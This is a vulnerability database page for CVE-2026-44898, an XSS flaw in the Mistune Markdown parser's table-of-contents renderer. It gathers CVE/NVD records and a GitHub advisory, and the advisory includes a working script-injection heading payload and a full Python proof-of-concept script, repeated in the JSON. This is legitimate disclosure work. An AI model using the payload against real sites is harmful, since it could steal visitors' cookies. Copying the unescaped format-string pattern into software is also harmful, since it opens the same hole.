Vulnerability-Lookup

CVE-2026-44898 (GCVE-0-2026-44898)

Vulnerability from cvelistv5 – Published: 2026-05-26 20:41 – Updated: 2026-05-27 17:57

Title

Mistune TOC Anchor Injection XSS

Summary

Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string — with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1.

Severity

6.1 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/lepture/mistune/security/advis…	x_refsource_CONFIRM
https://github.com/lepture/mistune/releases/tag/v3.2.1	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
lepture	mistune	Affected: < 3.2.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44898",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-27T17:57:34.250055Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-27T17:57:38.643Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "mistune",
          "vendor": "lepture",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.2.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a \u003cul\u003e table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href=\"#\u003cid\u003e\") and the text value (used as the visible link label) are inserted into \u003ca\u003e tags via a plain Python format string \u2014 with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href=\"#...\" attribute context, injecting arbitrary HTML tags including \u003cscript\u003e blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-26T20:41:53.805Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv"
        },
        {
          "name": "https://github.com/lepture/mistune/releases/tag/v3.2.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/lepture/mistune/releases/tag/v3.2.1"
        }
      ],
      "source": {
        "advisory": "GHSA-6269-cqxg-mhhv",
        "discovery": "UNKNOWN"
      },
      "title": "Mistune TOC Anchor Injection XSS"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44898",
    "datePublished": "2026-05-26T20:41:53.805Z",
    "dateReserved": "2026-05-07T21:50:33.546Z",
    "dateUpdated": "2026-05-27T17:57:38.643Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44898",
      "date": "2026-05-28",
      "epss": "0.00029",
      "percentile": "0.08824"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44898\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-26T21:16:39.810\",\"lastModified\":\"2026-05-28T13:42:13.527\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a \u003cul\u003e table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href=\\\"#\u003cid\u003e\\\") and the text value (used as the visible link label) are inserted into \u003ca\u003e tags via a plain Python format string \u2014 with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href=\\\"#...\\\" attribute context, injecting arbitrary HTML tags including \u003cscript\u003e blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mistune_project:mistune:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.1\",\"matchCriteriaId\":\"A91629D7-7A30-4A3F-B1AD-17FE21D59820\"}]}]}],\"references\":[{\"url\":\"https://github.com/lepture/mistune/releases/tag/v3.2.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Mistune TOC Anchor Injection XSS\", \"source\": {\"advisory\": \"GHSA-6269-cqxg-mhhv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"lepture\", \"product\": \"mistune\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.2.1\"}]}], \"references\": [{\"url\": \"https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv\", \"name\": \"https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/lepture/mistune/releases/tag/v3.2.1\", \"name\": \"https://github.com/lepture/mistune/releases/tag/v3.2.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a \u003cul\u003e table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href=\\\"#\u003cid\u003e\\\") and the text value (used as the visible link label) are inserted into \u003ca\u003e tags via a plain Python format string \\u2014 with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href=\\\"#...\\\" attribute context, injecting arbitrary HTML tags including \u003cscript\u003e blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-26T20:41:53.805Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44898\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-27T17:57:34.250055Z\"}}}], \"references\": [{\"url\": \"https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-05-27T17:57:15.703Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44898\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-26T20:41:53.805Z\", \"dateReserved\": \"2026-05-07T21:50:33.546Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-26T20:41:53.805Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44898

Vulnerability from fkie_nvd - Published: 2026-05-26 21:16 - Updated: 2026-05-28 13:42

Severity

6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/lepture/mistune/releases/tag/v3.2.1	Product, Release Notes
security-advisories@github.com	https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	mistune_project	mistune	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:mistune_project:mistune:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A91629D7-7A30-4A3F-B1AD-17FE21D59820",
              "versionEndExcluding": "3.2.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a \u003cul\u003e table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href=\"#\u003cid\u003e\") and the text value (used as the visible link label) are inserted into \u003ca\u003e tags via a plain Python format string \u2014 with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href=\"#...\" attribute context, injecting arbitrary HTML tags including \u003cscript\u003e blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1."
    }
  ],
  "id": "CVE-2026-44898",
  "lastModified": "2026-05-28T13:42:13.527",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-26T21:16:39.810",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/lepture/mistune/releases/tag/v3.2.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-6269-CQXG-MHHV

Vulnerability from github – Published: 2026-05-14 16:36 – Updated: 2026-05-14 16:36

Summary

Mistune TOC Anchor Injection XSS

Details

Summary

render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string — with no HTML escaping applied to either value.

When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC.

This vulnerability is closely related to H2 (unescaped id= in heading()): the same heading_id callback pattern that triggers H2 also populates the toc_items list that render_toc_ul() consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.

Details

File: src/mistune/toc.py

def render_toc_ul(toc):
    ...
    for level, k, text in toc:
        # k   = heading id  (used verbatim as href fragment)
        # text = heading text (used verbatim as link label)
        item = '<a href="#{}">{}</a>'.format(k, text)
        # Neither k nor text is passed through escape() at any point

The k and text values come directly from the toc_items list accumulated during parsing. If k contains " or >, the href attribute is broken. If text contains <, raw tags are injected as the visible link content.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom callback). The default hook assigns sequential numeric IDs that never contain user text:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_src = "# Introduction\n\n## Installation\n"
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

Output — clean, safe TOC:

<ul>
<li><a href="#toc_1">Introduction</a>
<ul>
<li><a href="#toc_2">Installation</a></li>
</ul>
</li>
</ul>

Step 2 — Enable the vulnerable heading_id callback

Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:

def raw_id(token, index):
    return token.get("text", "")

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text terminates the href="#..." attribute and injects a <script> block followed by a dangling <a href=" to absorb the closing "> that render_toc_ul appends:

## x"><script>alert(document.cookie)</script><a href="

When raw_id processes this heading, it returns the entire text as the ID: x"><script>alert(document.cookie)</script><a href=".

Step 4 — Observe script injection in the TOC output

ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

render_toc_ul() formats the malicious ID directly into the <a href>:

'<a href="#{}">{}</a>'.format(k, text)
# becomes:
'<a href="#x"><script>alert(document.cookie)</script><a href="">...<a/>'

Actual output:

<ul>
<li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li>
</ul>

The <script> block is live in the document. Note that the anchor label (text) is escaped correctly by mistune's inline renderer before it reaches toc_items, but k (the heading ID) is not escaped anywhere.

Script

I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser.

#!/usr/bin/env python3
"""H4: render_toc_ul() puts raw heading ID into <a href> without escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h4.md"
bl_src  = "# Introduction\n\n## Installation\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{bl_file}]\n{bl_src}")
print("[toc output — safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h4.md"
ex_src  = '## x"><script>alert(document.cookie)</script><a href="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{ex_file}]\n{ex_src}")
print("[toc output — script injected via href breakout]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>TOC output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H4 — TOC XSS</title><style>{CSS}</style></head><body>
<h1>H4 — TOC render_toc_ul() XSS</h1>
<p class="desc">render_toc_ul() in toc.py uses '&lt;a href="#{{}}"&gt;{{}}&lt;/a&gt;'.format(k, text) —
neither k (the heading ID) nor text is escaped before insertion.</p>
{case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h4.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once you run the script, open report_h4.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin
Integrity	Arbitrary DOM manipulation, phishing form injection, forced redirects
Availability	Page crash or freeze available as secondary effect

Risk context: TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.

Severity

6.1 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mistune"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "3.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "3.2.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44898"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T16:36:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n`render_toc_ul()` builds a `\u003cul\u003e` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href=\"#\u003cid\u003e\"`) and the `text` value (used as the visible link label) are inserted into `\u003ca\u003e` tags via a plain Python format string \u2014 with no HTML escaping applied to either value.\n\nWhen heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href=\"#...\"` attribute context, injecting arbitrary HTML tags including `\u003cscript\u003e` blocks directly into the rendered TOC.\n\nThis vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.\n\n## Details\n**File:** `src/mistune/toc.py`\n\n```python\ndef render_toc_ul(toc):\n    ...\n    for level, k, text in toc:\n        # k   = heading id  (used verbatim as href fragment)\n        # text = heading text (used verbatim as link label)\n        item = \u0027\u003ca href=\"#{}\"\u003e{}\u003c/a\u003e\u0027.format(k, text)\n        # Neither k nor text is passed through escape() at any point\n```\n\nThe `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `\"` or `\u003e`, the `href` attribute is broken. If `text` contains `\u003c`, raw tags are injected as the visible link content.\n\n## PoC\n**Step 1 \u2014 Establish the baseline (safe default IDs)**\n\nThe script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). The default hook assigns sequential numeric IDs that never contain user text:\n\n```python\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)\n\nbl_src = \"# Introduction\\n\\n## Installation\\n\"\n_, state = md_safe.parse(bl_src)\nbl_out = render_toc_ul(state.env.get(\"toc_items\", []))\n```\n\nOutput \u2014 clean, safe TOC:\n```html\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#toc_1\"\u003eIntroduction\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#toc_2\"\u003eInstallation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n```\n\n**Step 2 \u2014 Enable the vulnerable `heading_id` callback**\n\nRegister a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:\n\n```python\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")\n\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n```\n\n**Step 3 \u2014 Craft the exploit payload**\n\nConstruct a heading whose text terminates the `href=\"#...\"` attribute and injects a `\u003cscript\u003e` block followed by a dangling `\u003ca href=\"` to absorb the closing `\"\u003e` that `render_toc_ul` appends:\n\n```\n## x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"\n```\n\nWhen `raw_id` processes this heading, it returns the entire text as the ID: `x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"`.\n\n**Step 4 \u2014 Observe script injection in the TOC output**\n\n```python\nex_src = \u0027## x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"\\n\u0027\n_, state = md_vuln.parse(ex_src)\nex_out = render_toc_ul(state.env.get(\"toc_items\", []))\n```\n\n`render_toc_ul()` formats the malicious ID directly into the `\u003ca href\u003e`:\n\n```python\n\u0027\u003ca href=\"#{}\"\u003e{}\u003c/a\u003e\u0027.format(k, text)\n# becomes:\n\u0027\u003ca href=\"#x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"\"\u003e...\u003ca/\u003e\u0027\n```\n\nActual output:\n```html\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"\"\u003ex\u0026quot;\u0026gt;\u0026lt;script\u0026gt;alert(document.cookie)\u0026lt;/script\u0026gt;\u0026lt;a href=\u0026quot;\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n```\n\nThe `\u003cscript\u003e` block is live in the document. Note that the anchor *label* (`text`) is escaped correctly by mistune\u0027s inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere.\n\n### Script\n\nI have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser.\n\n```python\n#!/usr/bin/env python3\n\"\"\"H4: render_toc_ul() puts raw heading ID into \u003ca href\u003e without escaping.\"\"\"\nimport os, html as h\nfrom mistune import create_markdown\nfrom mistune.toc import add_toc_hook, render_toc_ul\n\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")\n\n# --- baseline ---\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)\n\nbl_file = \"baseline_h4.md\"\nbl_src  = \"# Introduction\\n\\n## Installation\\n\"\nwith open(os.path.join(os.getcwd(), bl_file), \"w\") as f:\n    f.write(bl_src)\n_, state = md_safe.parse(bl_src)\nbl_out = render_toc_ul(state.env.get(\"toc_items\", []))\n\nprint(f\"[{bl_file}]\\n{bl_src}\")\nprint(\"[toc output \u2014 safe]\")\nprint(bl_out)\n\n# --- exploit ---\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n\nex_file = \"exploit_h4.md\"\nex_src  = \u0027## x\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003ca href=\"\\n\u0027\nwith open(os.path.join(os.getcwd(), ex_file), \"w\") as f:\n    f.write(ex_src)\n_, state = md_vuln.parse(ex_src)\nex_out = render_toc_ul(state.env.get(\"toc_items\", []))\n\nprint(f\"[{ex_file}]\\n{ex_src}\")\nprint(\"[toc output \u2014 script injected via href breakout]\")\nprint(ex_out)\n\n# --- HTML report ---\nCSS = \"\"\"\nbody{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}\nh1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}\np.desc{color:#555;font-size:.9em;margin-top:6px}\n.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}\n.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}\n.baseline .case-header{background:#d1fae5;color:#065f46}\n.exploit  .case-header{background:#fee2e2;color:#7f1d1d}\n.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}\n.panel{padding:16px}\n.panel+.panel{border-left:1px solid #eee}\n.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}\npre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}\n.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}\n.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}\n\"\"\"\n\ndef case(kind, label, filename, src, out):\n    return f\"\"\"\n\u003cdiv class=\"case {kind}\"\u003e\n  \u003cdiv class=\"case-header\"\u003e{\u0027BASELINE\u0027 if kind==\u0027baseline\u0027 else \u0027EXPLOIT\u0027} \u2014 {h.escape(label)}\u003c/div\u003e\n  \u003cdiv class=\"panels\"\u003e\n    \u003cdiv class=\"panel\"\u003e\n      \u003ch3\u003eInput \u2014 {h.escape(filename)}\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(src)}\u003c/pre\u003e\n    \u003c/div\u003e\n    \u003cdiv 